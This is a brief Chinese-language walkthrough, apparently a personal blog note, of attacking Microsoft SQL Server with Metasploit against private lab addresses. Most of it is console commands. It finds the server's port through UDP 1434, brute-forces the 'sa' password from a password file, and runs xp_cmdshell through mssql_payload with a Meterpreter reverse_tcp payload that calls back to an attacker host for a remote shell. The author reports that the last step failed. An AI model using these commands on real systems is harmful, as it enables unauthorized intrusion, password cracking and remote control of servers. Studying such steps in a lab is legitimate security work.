攻击sqlserver

首先通过UDP1434端口，查询Sql server服务的TCP动态端口

msf > use auxiliary/scanner/mssql/mssql_ping

msf auxiliary(mssql_ping) > set rhosts 192.168.80.33

msf auxiliary(mssql_ping) > set threads 16

msf auxiliary(mssql_ping) > exploit

---

然后暴力破解sa用户的密码

msf auxiliary(mssql_ping) > use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set rhosts 192.168.80.33

msf auxiliary(mssql_login) > set username sa

msf auxiliary(mssql_login) > set pass_file /root/1.txt

msf auxiliary(mssql_login) > exploit

---

xp_cmdshell

以sa用户运行mssql时，可以执行xp_cmdshell存储过程，该存储过程允许直接与操作系统进行交互并执行命令。

msf auxiliary(mssql_login) > use exploit/windows/mssql/mssql_payload

msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp

msf exploit(mssql_payload) > set lhost 192.168.80.163

msf exploit(mssql_payload) > set rhost 192.168.80.33

msf exploit(mssql_payload) > set password 123456

msf exploit(mssql_payload) > exploit

成功exploit后，会获得目标主机meterpreter shell。但是我并没有测试成功，上传Stage完成后，提示如下内容。。

[*] Exploit completed, but no session was created.